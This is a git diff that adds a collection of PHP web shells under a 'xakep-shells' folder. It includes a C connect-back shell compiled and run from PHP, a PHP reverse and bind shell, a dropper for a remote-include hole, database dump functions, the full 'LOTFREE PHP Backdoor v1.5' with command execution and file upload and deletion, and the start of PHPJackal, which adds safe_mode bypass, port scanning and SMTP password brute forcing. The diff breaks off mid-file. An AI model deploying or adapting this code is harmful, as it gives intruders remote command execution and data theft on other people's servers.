+             "  l = strlen(argv[1]);\n" .
+             "  if (l <= 0) {\n" .
+             "    printf(\"[-] Invalid Host Name\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (!(host = (char *) malloc(l))) {\n" .
+             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  strncpy(host, argv[1], l);\n" .
+             "  if (argc == 3) {\n" .
+             "    port = atoi(argv[2]);\n" .
+             "    if (port <= 0 || port > 65535) {\n" .
+             "      printf(\"[-] Invalid Port Number\\n\");\n" .
+             "      return 1;\n" .
+             "    }\n" .
+             "  }\n" .
+             "  printf(\"[*] Resolving Host Name\\n\");\n" .
+             "  he = gethostbyname(host);\n" .
+             "  if (he) {\n" .
+             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
+             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
+             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  sin.sin_family = PF_INET;\n" .
+             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
+             "  sin.sin_port = htons(port);\n" .
+             "  printf(\"[*] Connecting...\\n\");\n" .
+             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
+             "    printf(\"[-] Socket Error\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
+             "    printf(\"[-] Unable to Connect\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Spawning Shell\\n\");\n" .
+             "  f = fork( );\n" .
+             "  if (f < 0) {\n" .
+             "    printf(\"[-] Unable to Fork\\n\");\n" .
+             "    return 1;\n" .
+             "  } else if (!f) {\n" .
+             "    write(sock, msg, sizeof(msg));\n" .
+             "    dup2(sock, 0);\n" .
+             "    dup2(sock, 1);\n" .
+             "    dup2(sock, 2);\n" .
+             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
+             "    close(sock);\n" .
+             "    return 0;\n" .
+             "  }\n" .
+             "  printf(\"[*] Detached\\n\\n\");\n" .
+             "  return 0;\n" .
+             "}\n";
+    $fbname = $tmp_dir . "/cbs";
+	$fp = fopen($fbname . ".c", "w");
+	$write = fwrite($fp, $shell);
+	fclose($fp);
+	if(!empty($write)) {
+		$command = $compiler . " -o " . $fbname . " " . $fbname . ".c";
+		$execM = test_cmd_shell();
+		if($execM > 0) {
+			$rtval = Mexec($command, $execM);
+			$command = $fbname . " " . $host . " " . $port;
+			$rtval .= Mexec($command, $execM);
+			return "<pre>" . $rtval . "</pre>";
+		} else {
+			return "<b>ERROR! No EXEC Avilable!</b>";
+		}
+		
+	} else {
+		return "<b>ERROR! Writing data!</b>";
+	}
+}
+
+######################################################################
+# drop mini inc hole
+######################################################################
+function dropminiinc($location) {
+	$Scode = "<?php\n".
+		"if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);\n".
+		"else \$vars = \$_REQUEST;\n".
+		"include(\$vars[inc]);\n".
+		"?>\n";
+	$fp = fopen($location, "w");
+	$write = fwrite($fp, $Scode);
+	if(!empty($write)) return "<b>$location</b> copied\n";
+	else return "<b>ERROR! Not copied!</b>";
+}
+
+######################################################################
+# db functions
+# unchanged from dans code
+######################################################################
+function prep_rows($myresult) {
+	$dataout = "<table>\n";
+	$num_fields = mysql_num_fields($myresult);
+	$dataout .= "<tr border=1>\n";
+	for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>";
+	$dataout .= "</tr>\n";
+	while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach($line as $colvalue) {
+			$dataout .= "<td>$colvalue</td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	return $dataout;
+}
+
+function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";";
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	mysql_free_result($result);
+	mysql_close($link);
+	return "Hopefully dumped!";
+}
+
+function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = $mysql." INTO OUTFILE \"".$mydump."\";";
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	mysql_free_result($result);
+	mysql_close($link);
+	return "Hopefully dumped!";
+}
+
+function display_query($myhost, $myuser, $mypass, $mydb, $mysql) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = $mysql;
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	$dataouted = prep_rows($result);
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataouted);
+}
+
+function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = "SELECT * FROM ".$mytable;
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	$dataouted = prep_rows($result);
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataouted);
+}
+
+function display_tables($myhost, $myuser, $mypass, $mydb) {
+	global $MyLoc,$SREQ;
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$result = mysql_list_tables($mydb);
+	if (!$result) {
+		return "DB Error, could not list tables";
+	}
+	$dataout = "<table>\n";
+	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach ($line as $col_value) {
+			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataout);
+}
+
+function display_dbs($myhost, $myuser, $mypass) {
+	global $MyLoc,$SREQ;
+	$link = mysql_connect($myhost, $myuser, $mypass);
+	$result = mysql_list_dbs($link);
+	if (!$result) {
+		return "DB Error, could not list databases";
+	}
+	$dataout = "<table>\n";
+	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach ($line as $col_value) {
+			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataout);
+}
+
+function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
+	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$query = "SELECT * FROM ".$mytable;
+	$result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error();
+	$dataout = "<table>\n";
+	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
+		$dataout = $dataout . "<tr>\n";
+		foreach($line as $colvalue) {
+			$dataout = $dataout . "<td>$colvalue</td>\n";
+		}
+	$dataout = $dataout . "</tr>\n";
+	}
+	$dataout = $dataout . "</table>\n";
+	return($dataout);
+}
+
+function Odisplay_tables($myhost, $myuser, $mypass) {
+	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$result = odbc_tables($link);
+	if (!$result) {
+		return "DB Error, could not list tables";
+	}
+	$dataout = "<table>\n";
+	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
+		if(odbc_result($line, 4) == "TABLE") {
+			$dataout = $dataout . "<tr>\n";
+			$dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>\n"; 
+		}
+		$dataout = $dataout . "</tr>\n";
+	}
+	$dataout = $dataout . "</table>\n";
+	return($dataout);
+}
+
+######################################################################
+# Dan's Network function Wrappers
+# Initial use inside this script, need to handle the error data 
+# differently to get it included in the base 64 output!
+######################################################################
+
+function DB_NET_GET_SOCKET_PROTOCOL($prot) {
+	switch($prot) {
+		case "udp":
+			$protocol = SOL_UDP;
+			$socktype = SOCK_DGRAM;
+		break;
+		case "tcp":
+		default:
+			$protocol = SOL_TCP;
+			$socktype = SOCK_STREAM;
+		break;
+	}
+	return(array($protocol, $socktype));
+}
+
+function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") {
+	$address = gethostbyname($hostname);
+	list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot);
+	switch($prot) {
+		case "udp":
+			$protocol = SOL_UDP;
+			$socktype = SOCK_DGRAM;
+		break;
+		case "tcp":
+		default:
+			$protocol = SOL_TCP;
+			$socktype = SOCK_STREAM;
+		break;
+	}
+	$socket = socket_create(AF_INET, $socktype, $protocol);
+	if ($socket < 0) {
+		echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n";
+	}
+
+	$result = socket_connect($socket, $address, $port);
+	if ($result < 0) {
+		echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n";
+	}
+	return $socket;
+}
+
+function DB_NET_LISTEN($address, $port) {
+	if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
+		echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
+		return(-1);
+	}
+
+	if (($ret = socket_bind($sock, $address, $port)) < 0) {
+		echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
+		return(-2);
+	}
+
+	if (($ret = socket_listen($sock, 5)) < 0) {
+		echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
+		return(-3);
+	}
+
+	return($sock);
+}
+
+######################################################################
+# Dan's PHP Connect Back / Port Binding Shell!
+# Yes that right a REAL shell!
+# Now I had this idea for ages, finally coded it 6 months ago, and 
+# it's never really been used.
+# Not really brain science but when there are many examples of PHP 
+# sockets + proc_open it's a little harder.
+######################################################################
+
+function DB_Shell($type, $shell, $port, $host = "0.0.0.0") {
+	if($type == "cb" && $host != "0.0.0.0") {
+		$procsock = DB_NET_CONNECT($host, $port, "tcp");
+	} elseif ($type == "pb") {
+		$lsock = DB_NET_LISTEN($host, $port);
+		if (($procsock = socket_accept($lsock)) < 0) {
+    		return "socket_accept() failed: reason: " . socket_strerror($procsock) . "\n";
+    	}
+	} else {
+		return "Error no connection details specified!";
+	}
+
+	set_time_limit(9000);
+	$descriptorspec = array(
+		0 => array("pipe", "r"),
+		1 => array("pipe", "w"),
+		2 => array("pipe", "w")
+	);
+	$process = proc_open($shell, $descriptorspec, $pipes);
+	if (is_resource($process)) {
+		$tmp_loop = 1;
+		do {
+			$tmp_array = array($procsock);
+			$num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0);
+			if ($num_changed_sockets === false) {
+				$tmp_loop = 0;
+			} else if ($num_changed_sockets > 0) {
+				foreach($tmp_array as $k => $v) {
+					if($v == $procsock) {
+						if(socket_last_error($procsock) > 0) $tmp_loop = 0;
+						if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0;
+						fwrite($pipes[0], $buf);
+					}
+				}
+			}
+			$tmp_arrayS = array($pipes[1], $pipes[2]);
+			$num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0);
+			if ($num_changed_streams === FALSE) {
+				$tmp_loop = 0;
+			} else if ($num_changed_streams > 0) {
+				foreach($tmp_arrayS as $k => $v) {
+					if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0;
+					socket_write($procsock, $buf, strlen($buf));
+				}
+			}
+		} while($tmp_loop == 1);
+	} else {
+		return "Error executing shell " . $shell;
+	}
+}
+
+?>
diff --git a/xakep-shells/PHP/phpbackdoor15.php.txt b/xakep-shells/PHP/phpbackdoor15.php.txt
new file mode 100644
index 0000000..06f2321
--- /dev/null
+++ b/xakep-shells/PHP/phpbackdoor15.php.txt
@@ -0,0 +1,133 @@
+<?php
+function good_link($link)
+{
+  $link=ereg_replace("/+","/",$link);
+  $link=ereg_replace("/[^/(..)]+/\.\.","/",$link);
+  $link=ereg_replace("/+","/",$link);
+  if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2);
+  if($link=="")$link=".";
+  return $link;
+}
+
+$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:".";
+$dir=good_link($dir);
+$rep=opendir($dir);
+chdir($dir);
+
+if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="")
+{
+  header("Content-Type: application/octet-stream");
+  header("Content-Length: ".filesize($_REQUEST["down"]));
+  header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
+  readfile($_REQUEST["down"]);
+  exit();
+}
+?>
+<html>
+<head><title>LOTFREE PHP Backdoor v1.5</title></head>
+<body>
+<br>
+<?php
+  echo "Actuellement dans <b>".getcwd()."</b><br>\n";
+  echo "<b>dir = '$dir'</b><br>\n";
+  echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n";
+ 
+  if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="")
+  {
+    echo "<pre>\n";
+    system($_REQUEST['cmd']);
+    echo "</pre>\n";
+  }
+
+  if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"]))
+  {
+    if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"])
+    {
+      if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"])))
+      {
+        echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n";
+      }
+      else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n";
+    }
+    else echo "fichier trop gros!<br>\n";
+  }
+
+  if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="")
+  {
+    if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n";
+    else echo "Impossible de supprimer le fichier<br>\n";
+  }
+
+?>
+<hr>
+<table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue">
+<?php
+  $t_dir=array();
+  $t_file=array();
+  $i_dir=0;
+  $i_file=0;
+  while($x=readdir($rep))
+  {
+    if(is_dir($x))$t_dir[$i_dir++]=$x;
+    else $t_file[$i_file++]=$x;
+  }
+  closedir($rep);
+  while(1)
+  {
+?>
+<tr>
+  <td width="20%" bgcolor="lightgray" valign="top">
+<?php
+    if($x=each($t_dir))
+    {
+      $name=$x["value"];
+      if($name=='.'){}
+      elseif($name=='..') echo "    <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n";
+      else echo "    <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n";
+    }
+?>
+  </td>
+  <td width='78%'<?php
+    if($y=each($t_file))
+    {
+      if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n";
+      else echo ">\n";
+      echo "    <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n";
+    }
+    else echo ">\n";
+?>
+  </td>
+  <td valign='center' width='2%'<?php
+    if($y)
+    {
+      if($y["key"]%2==0)echo " bgcolor='lightgreen'";
+      echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>";
+    }
+    else echo ">\n";
+?></td>
+</tr>
+<?php
+    if(!$x && !$y)break;
+  }
+?>
+</table>
+<hr>
+<br>
+<a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br>
+<form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
+Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!">
+</form><br>
+Uploader un fichier dans le repertoire courant :<br>
+<form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
+<input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000">
+<input type="submit" value="upl0ad!"></form><br>
+<br>
+<center>
+PHP Backdoor Version 1.5<br>
+by sirius_black / LOTFREE TEAM<br>
+Execute commands, browse the filesystem<br>
+Upload, download and delete files...<br>
+<a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br>
+</center>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/phpjackal.php.txt b/xakep-shells/PHP/phpjackal.php.txt
new file mode 100644
index 0000000..9b3a1ac
--- /dev/null
+++ b/xakep-shells/PHP/phpjackal.php.txt
@@ -0,0 +1,1413 @@
+<?php
+#--Config--#
+$login_password= ''; //Set password
+#----------#
+error_reporting(E_ALL);
+set_time_limit(0);
+ini_set("max_execution_time","0");
+ini_set("memory_limit","9999M");
+set_magic_quotes_runtime(0);
+if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS;
+if(!isset($_POST))$_POST = &$HTTP_POST_VARS;
+if(!isset($_GET))$_GET = &$HTTP_GET_VARS;
+if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS;
+$_REQUEST = array_merge($_GET, $_POST);
+if (get_magic_quotes_gpc()){
+foreach ($_REQUEST as $key=>$value)
+{
+$_REQUEST[$key]=stripslashes($value);
+}
+}
+function hlinK($str=""){
+$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
+$ret=$_SERVER['PHP_SELF']."?";
+$new=explode("&",$str);
+foreach ($_GET as $key => $v){
+$add=1;
+foreach($new as $m){
+$el = explode("=", $m);
+if ($el[0]==$key)$add=0;
+}
+if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
+}
+$ret.=$str;
+return $ret;
+}
+if(!empty($login_password)){
+if(!empty($_REQUEST['fpassw'])){
+if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
+@header("Location: ".hlinK());
+}
+if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>");
+}
+if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);
+function checkthisporT($ip,$port,$timeout,$type=0){
+if(!$type){
+$scan=@fsockopen($ip,$port,$n,$s,$timeout);
+if($scan){fclose($scan);return 1;}
+}
+elseif(function_exists('socket_set_timeout')){
+$scan=@fsockopen("udp://".$ip,$port);
+if($scan){
+socket_set_timeout($scan,$timeout);
+@fwrite($scan,"\x00");
+$s=time();
+fread($scan,1);
+if((time()-$s)>=$timeout){fclose($scan);return 1;}
+}
+}
+return 0;
+}
+if (!function_exists("file_get_contents")){
+function file_get_contents($addr){
+$a = fopen($addr,"r");
+$tmp = fread($a,filesize($a));
+fclose($a);
+if($a)return $tmp;
+}
+}
+if (!function_exists("file_put_contents")){
+function file_put_contents($addr,$con){
+$a = fopen($addr,"w");
+if(!$a)return 0;
+fwrite($a,$con);
+fclose($a);
+return strlen($con);
+}
+}
+function flusheR(){
+flush();@ob_flush();
+}
+if (!empty($_REQUEST['downloaD'])){
+@ob_clean();
+$dl=$_REQUEST['downloaD'];
+$con=file_get_contents($dl);
+header("Content-type: application/octet-stream");
+header("Content-disposition: attachment; filename=\"$dl\";");
+header("Content-length: ".strlen($con));
+echo $con;
+exit;
+}
+if (!empty($_REQUEST['imagE'])){
+$img=$_REQUEST['imagE'];
+header("Content-type: imagE/gif");
+header("Content-length: ".filesize($img));
+header("Last-Modified: ".date("r",filemtime($img)));
+echo file_get_contents($img);
+exit;
+}
+@header("Cache-Control: no-cache, must-revalidate");
+@header("Expires: Mon, 7 Aug 1987 05:00:00 GMT");
+function showsizE($size){
+if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
+elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
+elseif ($size>=1024)$size = round(($size/1024),2)." KB";
+else $size .= " B";
+return $size;
+}
+if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
+$errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>";
+$et = "</td></tr></table>";
+$v="1.5";
+$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">";
+$intro="<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"><tr><td bgcolor=\"#666666\"><b>Script:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href=\"http://netjackal.by.ru\" target=\"_blank\">http://netjackal.by.ru</a><br><b>Email:</b> <a href=\"mailto:nima_501@yahoo.com?subject=PHPJackal\">nima_501@yahoo.com</a><br></font>$et</center>";
+$footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et";
+$hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">";
+$t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">";
+$crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
+function namE(){
+$name='';
+srand((double)microtime()*100000);
+for ($i=0;$i<=rand(3,10);$i++){
+$name.=chr(rand(97,122));
+}
+return $name;
+}
+function whereistmP(){
+$uploadtmp=ini_get('upload_tmp_dir');
+$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
+if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
+if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
+if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
+if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
+if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
+return ".";
+}
+function shelL($command){
+global $windows,$disablefunctions;
+$exec = '';$output= '';
+$dep[]=array('pipe','r');$dep[]=array('pipe','w');
+if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
+elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
+elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
+elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
+elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
+elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
+elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
+return $exec;
+}
+function downloadiT($get,$put){
+$fo=@strtolower(ini_get('allow_url_fopen'));
+if($fo || $fo=='on')$con=file_get_contents($get);
+else{
+$u=parse_url($get);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+$url=fsockopen($host, 80, $en, $es, 12);
+fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
+$tmp=$con='';
+while($tmp!="\r\n")$tmp=fgets($url);
+while(!feof($url))$con.=fgets($url);
+}
+$mk=file_put_contents($put,$con);
+if($mk)return 1;
+return 0;
+}
+function smtplogiN($addr,$user,$pass,$timeout){
+$sock=fsockopen($addr,25,$n,$s,$timeout);
+if(!$sock)return -1;
+fread($sock,1024);
+fputs($sock,'ehlo '.namE()."\r\n");
+$res=substr(fgets($sock,512),0,1);
+if($res!='2')return 0;
+fgets($sock,512);fgets($sock,512);fgets($sock,512);
+fputs($sock,"AUTH LOGIN\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='334')return 0;
+fputs($sock,base64_encode($user)."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='334')return 0;
+fputs($sock,base64_encode($pass)."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='235')return 0;
+return 1;
+}
+function checksmtP($host,$timeout){
+$from=strtolower(namE())."@".strtolower(namE()).".com";
+$sock=@fsockopen($host,25,$n,$s,$timeout);
+if(!$sock)return -1;
+$res=substr(fgets($sock,512),0,3);
+if($res!='220')return 0;
+fputs($sock,'HELO '.namE()."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"MAIL FROM: <$from>\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"DATA\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='354')return 0;
+fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+return 1;
+}
+function check_urL($url,$method,$search,$timeout){
+if(empty($search))$search='200';
+$u=parse_url($url);
+$method=strtoupper($method);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+$data=(!empty($u['query']))?$u['query']:'';
+if(!empty($data))$data="?$data";
+$sock=@fsockopen($host,80,$en,$es,$timeout);
+if($sock){
+fputs($sock,"$method $file$data HTTP/1.0\r\n");
+fputs($sock,"Host: $host\r\n");
+if($method=='GET')fputs($sock,"\r\n");
+elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
+else return 0;
+if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
+while(!feof($sock)){
+$res=trim(fgets($sock));
+if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
+}
+fclose($sock);
+}
+return 0;
+}
+function get_sw_namE($host,$timeout){
+$sock=@fsockopen($host,80,$en,$es,$timeout);
+if($sock){
+$page=namE().namE();
+fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
+while(!feof($sock)){
+$con=fgets($sock);
+if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
+}
+fclose($sock);
+return -1;
+}return 0;
+}
+function snmpchecK($ip,$com,$timeout){
+$res=0;
+$n=chr(0x00);
+$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). 
+$com. chr(0xA0). 
+chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
+chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
+chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
+chr(0x01). chr(0x01). $n. chr(0x05). $n;
+$sock=@fsockopen("udp://$ip",161);
+socket_set_timeout($sock,$timeout);
+@fputs($sock,$packet);
+socket_set_timeout($sock,$timeout);
+$res=fgets($sock);
+fclose($sock);
+return $res;
+}
+
+$safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF';
+if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");}
+$disablefunctions = @ini_get('disable_functions');
+if (!function_exists("str_repeat")){
+function str_repeat($str,$c){
+$r="";
+for($i=0; $i < $cu; $i++)$r.=$str;
+return $r;
+}
+}
+
+function brshelL(){
